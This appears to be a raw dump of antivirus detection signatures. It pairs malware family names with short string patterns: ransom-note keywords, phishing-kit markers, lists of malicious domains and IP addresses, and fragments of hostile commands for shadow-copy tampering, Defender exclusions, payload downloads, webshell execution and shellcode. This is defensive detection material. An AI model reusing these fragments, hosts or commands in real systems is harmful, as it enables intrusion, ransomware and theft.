!#BRUTE:JAMSI:FuncN:86 .navigate( !#BRUTE:JAMSI:FuncN:91 .movelast( !#BRUTE:JAMSI:FuncN:93 .movefile( !#BRUTE:JAMSI:FuncN:96 .logevent( !#SCPT:ClnWordsCat1_19 7zipplugin !#SCPT:ClnWordsCat1_20 lantoucher !#SCPT:ClnWordsCat2_13 regulation !#SCPT:ClnWordsCat2_21 nowarranty !#SCPT:ClnWordsCat2_25 termsofuse !#SCPT:ClnWordsCat2_35 disclosure !#SCPT:ClnWordsCat2_39 permission !#SCPT:ClnWordsCat3_21 powercrypt !#SCPT:ClnWordsCat3_25 wordcount: !#SCPT:EoIronSource.00 cashurl.in !#SCPT:EoIronSource.01 adver.mobi !#SCPT:EoIronSource.07 uniqube.tv !#SCPT:EpsStrontiumXor <c45d6491> !#SCPT:JS/Belmont.ZD11 eunitnoctn !#SCPT:JS/Nemucod.AAD1 ['88']=''; payin3days !#SCPT:JS/Phish.S2!MTB .btn-email !#SCPT:Nemucod:Y0:0001 =\"==\";vari !#SCPT:Nemucod:Y0:0004 =\"xm\";vare !#SCPT:Nemucod:Y0:0005 =\"get\";var !#SCPT:Nemucod:Y0:0007 =\"pna\";var !#SCPT:OLE.Equation3.A equation.3 !#SCRIPT:Has_HtmlDiv.A <div class !#SCRIPT:PS_AD_Cmdlets get-aduser !#SCRIPT:StartExplorer &&explorer !#BRUTE:JAMSI:FuncN:103 .isready( !#BRUTE:JAMSI:FuncN:123 .getfile( !#BRUTE:JAMSI:FuncN:140 .execute( !#BRUTE:JAMSI:FuncN:178 .charset( !#BRUTE:JAMSI:FuncN:208 !#SCPT:Adodb.vbsappdata !#SCPT:CsharpWebShell.J .connect( !#SCPT:CsharpWebShell.K .receive( !#SCPT:EXCL:JS.Chrext.2 datalayer !#SCPT:JS/Denali.A1!eml p2capcity !#SCPT:JS/SLoad.RB1!MTB fucking80 !#SCPT:JS/SLoad.RB2!MTB injuice24 !#SCPT:Python.FromNumpy fromnumpy !#SCPT:RansomNoteCat4_3 !#SCPT:RansomNoteCat4_4 permanent !#SCPT:RansomNoteCat4_9 encrypted !#SCPT:RansomNoteCat5_3 greetings !#SCPT:RansomNoteCat6_9 btcdirect !#SCRIPT:PHP/Maghelp.A3 fwsoshell !#BRUTE:JS:Feature:M:486 *@cc_onv !#BRUTE:JS:Feature:M:505 ://slhzp !#PUA:MacOS/SurfBuyer.F4 webtools !#SCPT:AutoItApi_Ceiling ceiling( !#SCPT:AutoItApi_ClipGet clipget( !#SCPT:AutoItApi_ClipPut clipput( !#SCPT:AutoItApi_DirCopy dircopy( !#SCPT:AutoItApi_DirMove dirmove( !#SCPT:AutoItApi_DllCall dllcall( !#SCPT:AutoItApi_DllOpen dllopen( !#SCPT:AutoItApi_Execute !#SCPT:AutoItApi_InetGet inetget( !#SCPT:AutoItApi_IniRead iniread( !#SCPT:AutoItApi_IsAdmin isadmin( !#SCPT:AutoItApi_IsArray isarray( !#SCPT:AutoItApi_IsFloat isfloat( !#SCPT:AutoItApi_MouseUp mouseup( !#SCPT:AutoItApi_ObjName objname( !#SCPT:AutoItApi_RegRead regread( !#SCPT:AutoItApi_RunWait runwait( !#SCPT:AutoItApi_SRandom srandom( !#SCPT:AutoItApi_TCPRecv tcprecv( !#SCPT:AutoItApi_TCPSend tcpsend( !#SCPT:AutoItApi_ToolTip tooltip( !#SCPT:AutoItApi_TrayTip traytip( !#SCPT:AutoItApi_UDPBind udpbind( !#SCPT:AutoItApi_UDPOpen udpopen( !#SCPT:AutoItApi_UDPRecv udprecv( !#SCPT:AutoItApi_UDPSend udpsend( !#SCPT:AutoItApi_WinKill winkill( !#SCPT:AutoItApi_WinList winlist( !#SCPT:AutoItApi_WinMove winmove( !#SCPT:AutoItApi_WinWait winwait( =jquery. !#SCPT:RansomNoteCat3_12 rsa-1024 !#SCPT:RansomNoteCat3_13 rsa-2048 !#SCPT:RansomNoteCat3_39 tutanota !#SCPT:RansomNoteCat3_45 !#SCPT:RansomNoteCat3_46 weakness !#SCPT:RansomNoteCat4_13 impossib !#SCPT:RansomNoteCat4_17 personal !#SCPT:RansomNoteCat4_20 !#SCPT:RansomNoteCat4_21 !#SCPT:RansomNoteCat4_27 business !#SCPT:RansomNoteCat4_29 computer !#SCPT:RansomNoteCat4_32 !#SCPT:RansomNoteCat4_45 possible !#SCPT:RansomNoteCat4_50 software !#SCPT:RansomNoteCat6_11 coinbase !#SCPT:RansomNoteCat6_12 coincafe !#SCPT:RansomNoteCat6_14 coindesk !#SCPT:RansomNoteCat6_18 coinmama !#SCPT:TechBroloDetected detected !#SCPT:TechBroloTollFree tollfree !#SCPT:TechBrolobaInfect !#SCPT_AMSIDll_reference amsi.dll shell32. winhttp. !#SCRIPT:PHP/DirFunc!MTB opendir( !#SCRIPT:VBS/StringEXE.B .exe\"\">> !#SCPT:JsMethodFunc_abort .abort( \t.abort( !#SCPT:JsMethodFunc_apply .apply( \t.apply( !#SCPT:JsMethodFunc_atan2 .atan2( \t.atan2( !#SCPT:JsMethodFunc_atend .atend( \t.atend( !#SCPT:JsMethodFunc_blink .blink( \t.blink( !#SCPT:JsMethodFunc_every .every( \t.every( !#SCPT:JsMethodFunc_fixed .fixed( \t.fixed( !#SCPT:JsMethodFunc_floor .floor( \t.floor( !#SCPT:JsMethodFunc_isnan .isnan( \t.isnan( !#SCPT:JsMethodFunc_match .match( \t.match( !#SCPT:JsMethodFunc_parse .parse( \t.parse( !#SCPT:JsMethodFunc_round \t.round( !#SCPT:JsMethodFunc_shift .shift( \t.shift( !#SCPT:JsMethodFunc_slice .slice( \t.slice( !#SCPT:JsMethodFunc_small .small( \t.small( !#SCPT:JsMethodFunc_split \t.split( !#SCPT:JsMethodFunc_write !#SCPT:PDF:Stayt_13EE77D4 /en_en/ \t/en_en/ !#SCPT:PDF:Stayt_2DF9F342 /office \t/office !#SCPT:PDF:Stayt_4D54269C /de_de/ \t/de_de/ !#SCPT:PDF:Stayt_6B02E910 /us_us/ \t/us_us/ !#SCPT:PDF:Stayt_91F7E42D /admin/ \t/admin/ !#SCPT:PDF:Stayt_98211062 /xerox/ \t/xerox/ !#SCPT:PDF:Stayt_9BA0263C .com/en \t.com/en !#SCPT:PDF:Stayt_B9D21F35 .vn/de/ \t.vn/de/ !#SCPT:PDF:Stayt_C1228683 .com.br \t.com.br !#SCPT:PDF:Stayt_F0A4B8B8 /en_us/ \t/en_us/ !#SCPT:PDF:Stayt_F6EE2CD0 .ac.id/ \t.ac.id/ !#SCPT:PDF:Stayt_FF77220F com/de/ \tcom/de/ !#SCPT:Phish:PHP/Rmdir.GG rrmdir( \trrmdir( !#SCPT:Tobeet_Js_D669ED46 p,p,p~p \tp,p,p~p !#SCRIPT:FlashExp_elsefor elsefor \telsefor !#SCRIPT:FlashExp_is_vuln is_vuln \tis_vuln !#SCRIPT:FlashExp_rc4_key rc4_key \trc4_key !#SCRIPT:FlashExp_withfor withfor \twithfor !#SCRIPT:Has_PerlFormat.D ;BEGIN{ \t;BEGIN{ !#SCRIPT:JS/Nemucod.BG.01 ,\".pw\", \t,\".pw\", !#SCRIPT:JS/Nemucod.BG.05 ,\"run\", \t,\"run\", !#SCRIPT:VariableFormat.A format= \tformat= !#BRUTE:JAMSI:Feature: gi.web.app p&wxxqyqpeed.web.app p&xxkdntutkn.web.app p&zqtqkixbea.web.app //biglabs.asia .biglabs.asia p\"//factorbot.cyou p .factorbot.cyou p\"//fibermile.cyou p .fibermile.cyou p$//methodplex.cyou p\".methodplex.cyou p$//rachetdown.cyou p\".rachetdown.cyou p\"//solidknot.cyou p .solidknot.cyou p\"//boltaxle.store p .boltaxle.store p$//craftpath.store p\".craftpath.store p$//highdrift.store p\".highdrift.store p$//monofield.store p\".monofield.store !#NRI:Highscout.20210830.1 p$//my-oauth.online p\".my-oauth.online p //my-rfa.online .my-rfa.online p(//mydocs-rfa.online p&.mydocs-rfa.online p\"//rs-live.online p .rs-live.online //rs-ms.online .rs-ms.online p,//setting-live.online p*.setting-live.online p\"//sso-rfa.online p .sso-rfa.online p //files-ait.org .files-ait.org p&//files-taitra.org p$.files-taitra.org //my-dpp.org .my-dpp.org p //my-merics.org .my-merics.org p(//nextcloud-rfa.org p&.nextcloud-rfa.org p,//security-merics.org p*.security-merics.org p&//cc-mail-yahoo.pw p$.cc-mail-yahoo.pw p*//hotmail-upgrade.pw p(.hotmail-upgrade.pw //mail-live.pw .mail-live.pw p //mail-yahoo.pw .mail-yahoo.pw p,//outlookwebaccess.pw p*.outlookwebaccess.pw p$//yahoo-update.pw p\".yahoo-update.pw p\"//yahoocenter.pw p .yahoocenter.pw p&//yahoosecurity.pw p$.yahoosecurity.pw //amcham.space .amcham.space p*//myedit-yahoo.space p(.myedit-yahoo.space //my-gov.tw .my-gov.tw p //auth-yahoo.us .auth-yahoo.us //e-rfa.us .e-rfa.us //amcham.work .amcham.work p&//amchamdrive.work p$.amchamdrive.work p$//edit-yahoo.work p\".edit-yahoo.work //my-disk.work .my-disk.work p //my-yahoo.work .my-yahoo.work p //myamcham.work .myamcham.work //mydri.work .mydri.work //myfiles.work .myfiles.work p\"//sso-yahoo.work p .sso-yahoo.work p\"//untreated.work p .untreated.work //up-mail.work .up-mail.work !#NRI:Dirtvantionni.20210830 //legalair.cl .legalair.cl p(//amonziamahmud.com p&.amonziamahmud.com //amrymte.com .amrymte.com //atommjet.com .atommjet.com //buiyosi.com .buiyosi.com //cahmader.com .cahmader.com p$//cityhampton.com p\".cityhampton.com p4//clairecolemandesign.com p2.clairecolemandesign.com //ctudisb.com .ctudisb.com p$//ertelalsaop.com p\".ertelalsaop.com p0//ferrangrouprealty.com p..ferrangrouprealty.com p*//grizzresources.com p(.grizzresources.com p\"//gtfmontana.com p .gtfmontana.com p2//jessicawrighthomes.com p0.jessicawrighthomes.com p8//legacyeventsanddesign.com p6.legacyeventsanddesign.com //mavreii.com .mavreii.com //munhoiuy.com .munhoiuy.com p(//noeventteamsc.com p&.noeventteamsc.com //oakays.com .oakays.com p://orangetrucklandscaping.com p8.orangetrucklandscaping.com p //pkellyart.com .pkellyart.com p.//plasticexchanges.com p,.plasticexchanges.com p\"//roommeband.com p .roommeband.com p$//royalvipcar.com p\".royalvipcar.com p$//ryderscotts.com p\".ryderscotts.com p*//sakai-antilles.com p(.sakai-antilles.com pH//scoreclockssportstechnologies.com pF.scoreclockssportstechnologies.com //tekolm.com .tekolm.com p(//truthaboutisi.com p&.truthaboutisi.com p4//yshoreunderwritters.com p2.yshoreunderwritters.com p$//musiccenter.net p\".musiccenter.net p&//radhikawalia.net p$.radhikawalia.net p.//thetruthaboutisi.net p,.thetruthaboutisi.net //cpanel.co.th .cpanel.co.th p*//ambientphota.co.uk p(.ambientphota.co.uk p,//plasticwastes.co.uk p*.plasticwastes.co.uk p(//ssellrrctlm.co.uk p&.ssellrrctlm.co.uk //acurashu.com .acurashu.com //altlass.com .altlass.com //banksgmb.com .banksgmb.com //bmwfor.com .bmwfor.com //checkauj.com .checkauj.com p //clubggtop.com .clubggtop.com //digtstat.com .digtstat.com //firedigt.com .firedigt.com p\"//franktomaz.com p .franktomaz.com //groupbzs.com .groupbzs.com //hondame.com .hondame.com //jomihd.com .jomihd.com p //macrodown.com .macrodown.com p&//mariamistado.com p$.mariamistado.com //mazdafo.com .mazdafo.com //merssed.com .merssed.com //microgbm.com .microgbm.com p(//minicombosoft.com p&.minicombosoft.com //mitsubon.com .mitsubon.com //namastat.com .namastat.com //sammitng.com .sammitng.com p&//securesoftme.com p$.securesoftme.com //sharpfoz.com .sharpfoz.com //shuterb.com .shuterb.com p //softsecur.com .softsecur.com p$//waitingdate.com p\".waitingdate.com //zanzibor.com .zanzibor.com //zkhvolg.com .zkhvolg.com p(acura.azureedge.net p&apiz.azureedge.net p,atlasin.azureedge.net p$bmw.azureedge.net p*checks.azureedge.net p(clubg.azureedge.net p&diva.azureedge.net p&fans.azureedge.net p&five.azureedge.net p&ford.azureedge.net p$fox.azureedge.net p(honda.azureedge.net p,karavan.azureedge.net p0macrodown.azureedge.net p$mat.azureedge.net p(mazda.azureedge.net p&mers.azureedge.net p(mitsu.azureedge.net p*onenew.azureedge.net p6securesoftme.azureedge.net p(seven.azureedge.net p(sharp.azureedge.net p(smith.azureedge.net p&sofa.azureedge.net p&soft.azureedge.net p$sok.azureedge.net p(volga.azureedge.net p(zanzi.azureedge.net p<d3uexwarxkd1ug.cloudfront.net !#NRI:Dirtvantuonsi.20210830 //akastat.app .akastat.app p //azurestat.app .azurestat.app p$//akamaistats.com p\".akamaistats.com p\"//akametrics.com p .akametrics.com p&se1.buttonrich.com p(//classworldint.com p&.classworldint.com p6//dashsecuritybusiness.com p4.dashsecuritybusiness.com p4//discriminatesection.com p2.discriminatesection.com p(//displaychecks.com p&.displaychecks.com p>//entirelysecuritybusiness.com p<.entirelysecuritybusiness.com p\"//frostydawn.com p .frostydawn.com p>//hesitatesecuritybusiness.com p<.hesitatesecuritybusiness.com p6//janesecuritybusiness.com p4.janesecuritybusiness.com p6//killsecuritybusiness.com p4.killsecuritybusiness.com p6//knotsecuritybusiness.com p4.knotsecuritybusiness.com p4//letsecuritybusiness.com p2.letsecuritybusiness.com p6//listsecuritybusiness.com p4.listsecuritybusiness.com p8//livedsecuritybusiness.com p6.livedsecuritybusiness.com p6//madesecuritybusiness.com p4.madesecuritybusiness.com p.//notepadsswallows.com p,.notepadsswallows.com p$//pacerenrapt.com p\".pacerenrapt.com p\"//risetomoon.com p .risetomoon.com p6//ropesecuritybusiness.com p4.ropesecuritybusiness.com p6//securitybusinessacid.com p4.securitybusinessacid.com p6//securitybusinesshurt.com p4.securitybusinesshurt.com p6//securitybusinessmean.com p4.securitybusinessmean.com p6//securitybusinessmeta.com '<scriptsrc= webmine.pro/lib/crlt.js !#Trojan:VBS/Gansom.A!vc3 wscript.createobject(\"wscript.shell\") 'wscript.createobject(\"wscript.shell\") !#Trojan:VBS/Powbow!f6f_5 a.writeline(\"awygkchhzxqtv21pt2jqzwn0 'a.writeline(\"awygkchhzxqtv21pt2jqzwn0 !#ALFPER:SCPT:Amonetize.A2 mybestofferstoday{tmp}(default){app} &mybestofferstoday{tmp}(default){app} :impassablefileprivatens:speculation &:impassablefileprivatens:speculation <dc:publisher>unknown</dc:publisher> &<dc:publisher>unknown</dc:publisher> !#SCPT:Downloader.Telbot.4 \"cmd.exe/c\"+arg+\" &\"cmd.exe/c\"+arg+\" @oshell.runcmd,0, !#SCPT:Exploit:JS/Anogre.B .substring(60).replace(/ &.substring(60).replace(/ /,\"\"); !#SCPT:HTML/Phish.PHS1!MTB url:'https://jiagnmehn.gq/post.php', &url:'https://jiagnmehn.gq/post.php', !#SCPT:HTML/Phish.VPP6!MTB data:{email:email,password:password, &data:{email:email,password:password, !#SCPT:HTML/Phish.VPV5!MTB >logintocontinuetrackingyourpackage< &>logintocontinuetrackingyourpackage< !#SCPT:NodeJS!createserver http.createserver((request,response) &http.createserver((request,response) 45.142.214.113/ &45.142.214.113/ </f><v> ?</f><v> !#SCPT:O97M/Qakbot.RQQ!MTB +creatdicoya\\:jmgshlexukn/statik.exe &+creatdicoya\\:jmgshlexukn/statik.exe -:5@=;creatdicoya\\:jmgshlexu/q/1.gif &-:5@=;creatdicoya\\:jmgshlexu/q/1.gif !#SCPT:O97M/Ursnif.RR1!MTB http://149.3.170.235/qw-fad/ &http://149.3.170.235/qw-fad/ .exe< !#SCPT:O97M/Ursnif.RU2!MTB &<si><t>lregis</t></si> O<si><t>ter< !#SCPT:PS:ReflectiveInject invoke-reflectivepeinjection-pebytes &invoke-reflectivepeinjection-pebytes !#SCPT:PWS:HTML/Phish.ORC1 pleaseverifyyoursocialsecuritynumber &pleaseverifyyoursocialsecuritynumber !#SCPT:PsCheckIpWebRequest invoke-webrequest-uri &invoke-webrequest-uri curlmyip.net !#SCPT:Trojan:JS/Phish.DU2 javascript>document.write(unescape(' &javascript>document.write(unescape(' !#SCPT:iwshWscriptLaunch.A &iwshshell .run(\"true\",\"1\",\"wscript !#SCRIPT:HTML/TechIframe.A <iframeid=\" &<iframeid=\" \"src=\"/site\"></iframe> on(){++(window[ &on(){++(window[ \t0-9a-zA-Z].body)} !#SCRIPT:PHP/Bewbyp.A3!MTB <?echo\"uname-a:\";echo(php_uname())?> &<?echo\"uname-a:\";echo(php_uname())?> !#SCRIPT:Python/Redjohn.A1 /windows/startmenu/programs/startup/ &/windows/startmenu/programs/startup/ !#SCRIPT:SuspAccountdiscov get-aduser-filter &get-aduser-filter name-like\"*admin !#SCRIPT:WDImpairDefense.B &add-mppreference 0-exclusionpathc:\\ !#Trojan:HTML/Phish.KSH!a2 /wp-content/uploads/ &/wp-content/uploads/ /dhl-logo.jpg !#Trojan:VBS/Rsado.R!Rttr3 wshell.run\"schtasks/create/sconce/tn &wshell.run\"schtasks/create/sconce/tn !#Exploit:HTML/Fllout.A_DH2 emptyvalendsubfunctionexploit(arg1) %emptyvalendsubfunctionexploit(arg1) !#SCPT:HTML/Phish.DHHZ3!MTB yurmilrsswordisinrrt.pleasetryagain %yurmilrsswordisinrrt.pleasetryagain !#SCPT:JS/MalScript.ZY3!MTB .run(\"wscript.exe//b\\\"\"+s2+\"\\\"\",6); %.run(\"wscript.exe//b\\\"\"+s2+\"\\\"\",6); !#SCPT:JS/Obfuse.RMXLX3!MTB ;\",array(\"dat\",\"at\",\"ype\").joi',']; %;\",array(\"dat\",\"at\",\"ype\").joi',']; !#SCPT:O97M/EncDoc.REV2!MTB <si><t>http://45.84.1.195/</t></si> %<si><t>http://45.84.1.195/</t></si> wnloadtfilldo\") %wnloadtfilldo\") svr32 O/you.html !#SCPT:O97M/IcedId.RVS5!MTB on.time(now()+\"00:00:02\",\"milolos\") %on.time(now()+\"00:00:02\",\"milolos\") !#SCPT:O97M/Qakbot.RVQ6!MTB <si><t>http://45.90.59.77/</t></si> %<si><t>http://45.90.59.77/</t></si> !#SCPT:PSByteShellcodeJmp.A %[byte[]]$ P=0xeb,0x5a,0x31,0xc0,0x !#SCPT:PWS:HTML/Phish.SMKV4 emailsettings|for:<i><?phpecho$mail %emailsettings|for:<i><?phpecho$mail !#SCPT:Trojan:VBS/HiddenRun objshell.run %objshell.run start .exe\",vbhide !#SCRIPT:JS/ExplLoadFlash.C %+'<paramname=\"play\"value=\"true\"/>'; !#SCRIPT:JS/TechAlertCode.H for(i=0;i< %for(i=0;i< ;i++){ 0alert( .toString();history[_0x %.toString();history[_0x ](0,0,_0x !#SCRIPT:PHP/SocketCreate.A socket_create %socket_create (af_inet,sock_stream !#SCRIPT:PowerShell/TSyncml get-codepage-name %get-codepage-name -o365 -syncml !#SCRIPT:Python/TalkBack.B2 =serve_thread_udp,args=('',53,dns,) %=serve_thread_udp,args=('',53,dns,) !#Worm:VBS/Pordeezy.B!lnk.2 &cls&startjavaupdate. %&cls&startjavaupdate. jsvbe&cls& !#ALF:Exploit:HTML/EfCinco.E /tmui/lo $/tmui/lo in.jsp/%2e%2e%3b/hsqldb !#SCPT:O97M/Dridex.ZPGA9!MTB wmicprocesscallcreate\"rundll32.exe $wmicprocesscallcreate\"rundll32.exe !#SCPT:O97M/EncDoc.RAAB1!MTB <vt:lpstr>foglidilavoro</vt:lpstr> $<vt:lpstr>foglidilavoro</vt:lpstr> http://docs.atu.ngr.mybluehost.me/ $http://docs.atu.ngr.mybluehost.me/ !#SCPT:O97M/EncDoc.RJJJJ!MTB name1d.site/ $name1d.site/ !#SCPT:O97M/Encdoc.VISA3!MTB tar-xf..\\nioka.meposv-c..\\\"</f><v> $tar-xf..\\nioka.meposv-c..\\\"</f><v> !#SCPT:O97M/FormBook.RXX!EML /0ylkhhgkr5e5gks.php $/0ylkhhgkr5e5gks.php /o5atddb7ib8fbht.php $/o5atddb7ib8fbht.php !#SCPT:O97M/IcedID.VIS35!MTB <si><t>bkxf24hfvt03ftrd.xyz/grays. $<si><t>bkxf24hfvt03ftrd.xyz/grays. !#SCPT:O97M/Trickbot.SS3!MTB http://195.123.219.21/campo/t3/t3d $http://195.123.219.21/campo/t3/t3d !#SCPT:PWS:HTML/PhishHotMail onclick=\"openoffersdialoghotmail() $onclick=\"openoffersdialoghotmail() !#SCPT:Ransom:BAT/Clop.D!vc2 vssadminresizeshadowstorage/for=c: $vssadminresizeshadowstorage/for=c: !#SCPT:Trojan:HTML/Phish.KS2 formmethod=\"post\"action=\"post.php\" $formmethod=\"post\"action=\"post.php\" !#SCPT:Trojan:IS/AutoRun.KD6 systemroot%\\system32\\shell32.dll,4 $systemroot%\\system32\\shell32.dll,4 !#SCRIPT:BitmapRemotesave.A2 system.drawing.imaging.imageformat $system.drawing.imaging.imageformat !#SCRIPT:Exploit:JS/AimesuE2 string.prototype.mm=function(g,u){ $string.prototype.mm=function(g,u){ !#SCRIPT:Exploit:JS/AimesuJ3 sprayslide=sprayslide.substring(0, $sprayslide=sprayslide.substring(0, !#SCRIPT:Exploit:JS/AimesuO3 document.body.appendchild(otrtorol $document.body.appendchild(otrtorol !#SCRIPT:ExpwrapCreateProc.B methodname $methodname >start< >powershell document.body.style.cursor='wait'; $document.body.style.cursor='wait'; document.onmousedown=norightclick; $document.onmousedown=norightclick; updateTimer();}countdown( $updateTimer();}countdown( ,5,0); !#SCRIPT:JS/ExplFlashCheck.A .swfobjectutil.getplayerversion(); $.swfobjectutil.getplayerversion(); !#SCRIPT:RevobfoosBExclusion adatemllehsrewop< $adatemllehsrewop< 0\"=noisrevlmx?< !#TEL:PHP/Dirtelti.BTR10!mtb array_map(base64_decode( $array_map(base64_decode( !#Trojan:BAT/Sciptos.SB1!MTB if%date%== $if%date%== =%localappdata% !#Trojan:BAT/Sciptos.YA2!MTB ping8.8.8.8|>nulfind/i\"ttl=\"&&goto $ping8.8.8.8|>nulfind/i\"ttl=\"&&goto !#Trojan:JS/Sodinokibi.SA!A7 $else ++;}return !#Trojan:Linux/Downloader.M3 ./ssh;rm-rf3update.x86sshhistory-c $./ssh;rm-rf3update.x86sshhistory-c !#Trojan:O97M/DPlink.A!atb17 $<deeplink> 0rundll32 javascript !#SCPT:CodeOnly.Chewglobber.D elfmemorystreamer_getentry_offset #elfmemorystreamer_getentry_offset !#SCPT:RTF.LikelyObfuscated.B #}{\\p !#SCPT:RansomNote:NetWalker.B filesforthiscomputerhasextension: #filesforthiscomputerhasextension: !#SCPT:Trojan:BAT/Starter.G10 #cmd.exe /cstartdrive.bat&\"drive !#SCPT:Trojan:VBS/Danabot.CS3 .getspecialfolder(cint(\"2\"))+\"\\\") #.getspecialfolder(cint(\"2\"))+\"\\\") varstr='v!a!r#?p#l#0!6#w?n#h^k^^= #varstr='v!a!r#?p#l#0!6#w?n#h^k^^= !#SCRIPT:Backdoor:JS/Moktik.B xxx', #xxx', :'ddd', :'uuu', :'ccc !#SCRIPT:Exploit:JS/Scanbox.H case8:case9:case13:case32:case37: #case8:case9:case13:case32:case37: !#SCRPT:Trojan:VBS/Movanide.1 callmoveandhide(\"\\installer.vbs\") #callmoveandhide(\"\\installer.vbs\") !#Trojan:Win32/Powieat.A3!MTB #invoke-webrequest-uri -outfile$ !#ALF:Backdoor:PHP/WebShell.RF <title>5quarep4ntz5h3ll_</title> \"<title>5quarep4ntz5h3ll_</title> <title>jingklongbajingan</title> \"<title>jingklongbajingan</title> !#BRUTE:LNK:Expert:Feature:220 %cd%\\ \"%cd%\\ &&%windir%\\explorer%cd%\\ !#Backdoor:ASP/Webshell.G!ptb2 =runtime.getruntime().exec(str); \"=runtime.getruntime().exec(str); !#PowerShell:UACBypass!Lowfi.2 functiondisable-executionpolicy{ \"functiondisable-executionpolicy{ !#Ransom:AndroidOS/SimpLock.D3 res/xml/ \"res/xml/ device_admin_data.xml !#SCPT:PWS:HTML/PhishYahooMail onclick=\"openoffersdialogyahoo() \"onclick=\"openoffersdialogyahoo() !#SCPT:Trojan:JS/Tnega.SK2!MTB returnstr.split(\"n\").join(\"31\"); \"returnstr.split(\"n\").join(\"31\"); !#SCRIPT:Exploit:JS/Pangimop-5 type=\"application/x-java-applet\" \"type=\"application/x-java-applet\" !#SCRIPT:Exploit:SWF/Netis.Z-2 http://adobe.com/as3/ \"http://adobe.com/as3/ /builtin audio( \"audio( 0.mp3 .loop=true; !#SCRIPT:PHP/Phisherthe.B1!MTB =$_server['remote_addr'].\"\\r\\n\"; \"=$_server['remote_addr'].\"\\r\\n\"; !#SCRIPT:Ransom:HTML/Sarento.A .onion.cab///vict?cust= \".onion.cab///vict?cust= (&guid= !#SCRIPT:Worm:JS/Bondat!Crypt1 varb=[], \"varb=[], parseint, @},a=\" !#SCRIPT:Worm:JS/Bondat!Crypt2 \"split )d.push( 36c)^t); =($_request[' \"=($_request[' ']);system( !#SCPT:GoPkgMainImportCryptoTls packagemainimport( d!packagemainimport( crypto/tls !#SCPT:Trojan:JS/Tnega.SST2!MTB document.write(\"<scr\"+\"iptsrc=' !document.write(\"<scr\"+\"iptsrc=' !#SCRIPT:Exploit:JS/Foosace.A-1 if(navigator.useragent.indexof( !if(navigator.useragent.indexof( !#SCRIPT:HTML/AudioPlayViaSWF.B <embedsrc=\" !<embedsrc=\" 0.swf?file= P.mp3 !#SCRIPT:JS/RequestFullScreen.A element.mozrequestfullscreen(); !element.mozrequestfullscreen(); !#SCRIPT:PSExploitAPIImports.A2 kernel32.dllwaitforsingleobject !kernel32.dllwaitforsingleobject !#SCRIPT:PSExploitShellCode.A11 system.net.webclient !system.net.webclient Pdownload !#SCRIPT:Python/Passhunt.A2!MTB pwd:aclassforrecordingpasswords !pwd:aclassforrecordingpasswords !#SCRIPT:SuspAmsiWmiClassName.A !#TEL:Ransom:O97M/GermanWiper.A http://expandingdelegation.top/ !http://expandingdelegation.top/ !#Trojan:HTML/Infwebpage.A3!MTB for(i=string.length-1;i>=0;i--) !for(i=string.length-1;i>=0;i--) !#ALF:Backdoor:JAVA/Webshell.RFN )K !#ALF:Backdoor:JAVA/Webshell.RFN pwnshell-aninteractivejspshell pwnshell-aninteractivejspshell !#SCPT:Exploit:JS/Blacole.substr )K !#SCPT:Exploit:JS/Blacole.substr +=string[fr]((p(s.substr(i,2), +=string[fr]((p(s.substr(i,2), !#SCPT:Obfuscator.Split.dotcom.A )K !#SCPT:Obfuscator.Split.dotcom.A (46+ \"m\"(109 !#SCPT:Trojan:HTML/Phish.PM3!MTB )K !#SCPT:Trojan:HTML/Phish.PM3!MTB vare=url.searchparams.get(\"e\") vare=url.searchparams.get(\"e\") !#SCPT:Trojan:HTML/Phish.SM2!MTB )K !#SCPT:Trojan:HTML/Phish.SM2!MTB !#SCPT:Trojan:HTML/Phish.SY3!MTB )K !#SCPT:Trojan:HTML/Phish.SY3!MTB (\"loginisok\")!=-1){$(\"#load2\") (\"loginisok\")!=-1){$(\"#load2\") !#SCPT:Trojan:PDF/Phish.PDA4!MTB )K !#SCPT:Trojan:PDF/Phish.PDA4!MTB reason:550spammessagerejected. reason:550spammessagerejected. )K !#SCPT:Trojan:Python/Banker.VCX1 key=winreg.openkey(0x80000001, key=winreg.openkey(0x80000001, !#SCPT:Trojan:VBS/Obfuse.RV4!MTB )K !#SCPT:Trojan:VBS/Obfuse.RV4!MTB right(w1,len(w1)-instr(w1,w2)) right(w1,len(w1)-instr(w1,w2)) !#SCPT:TrojanProxy:BAT/Banker.G2 )K !#SCPT:TrojanProxy:BAT/Banker.G2 .db\"(start/low/miniexplore.exe .db\"(start/low/miniexplore.exe )K !#SCRIPT:JS/TechMsgTimeoutCode.A settimeout(function(){confirm( settimeout(function(){confirm( !#SCRIPT:Powershell/MathTruncate )K !#SCRIPT:Powershell/MathTruncate =[math]::truncate( =[math]::truncate( *100) )K !#SCRIPT:Trojan:BAT/Qhost.AF_etc %%tokddddddd%c%uhhiuhukm%omset %%tokddddddd%c%uhhiuhukm%omset =%traffikback%%df2%c%som%omset =%traffikback%%df2%c%som%omset =d%esche%r%nichevoshenki%ivset =d%esche%r%nichevoshenki%ivset =em%rtrjjdddjjjjr%32\\dr%what%i =em%rtrjjdddjjjjr%32\\dr%what%i =em%rtrjjjjjjjjjr%32\\dr%what%i =em%rtrjjjjjjjjjr%32\\dr%what%i !#TEL:Exploit:HTML/Meercat.C!dha )K !#TEL:Exploit:HTML/Meercat.C!dha <title>xxxcontrolpanel</title> <title>xxxcontrolpanel</title> !#TEL:Exploit:Python/MILWORM.HZ4 )K !#TEL:Exploit:Python/MILWORM.HZ4 +=struct.pack(\"<l\",0x7c577b03) +=struct.pack(\"<l\",0x7c577b03) !#Trojan:AutoIt/Nanocore.PA1!MTB )K !#Trojan:AutoIt/Nanocore.PA1!MTB dim$startupdir=@tempdir&\"\\ dim$startupdir=@tempdir&\"\\ !#TrojanDropper:VBS/Bynoco!ptb06 )K !#TrojanDropper:VBS/Bynoco!ptb06 decodebase64=el.nodetypedvalue decodebase64=el.nodetypedvalue !!#SCPT:CmdMultiSlashPatterns.AMSI )K!!#SCPT:CmdMultiSlashPatterns.AMSI rtcshell(\"cmd !!#SCPT:Exploit:JS/Blacole.forloop )K!!#SCPT:Exploit:JS/Blacole.forloop .length; +=2){ !!#SCPT:HackTool:VBA/CreateShell.B )K!!#SCPT:HackTool:VBA/CreateShell.B createobject(\"wscript.shell\") !!#SCPT:O97M/ObfShellLaunch.A!amsi )K!!#SCPT:O97M/ObfShellLaunch.A!amsi @powershell !!#SCPT:Phish:PHP/Php_Get_Email.GG )K!!#SCPT:Phish:PHP/Php_Get_Email.GG <?php$email=$_get['email'];?> !!#SCPT:Ransom:BAT/Clop_Exclusion1 )K!!#SCPT:Ransom:BAT/Clop_Exclusion1 cuckoo/protections/behaviours !!#SCPT:Trojan:Linux/CoinMiner.JJ2 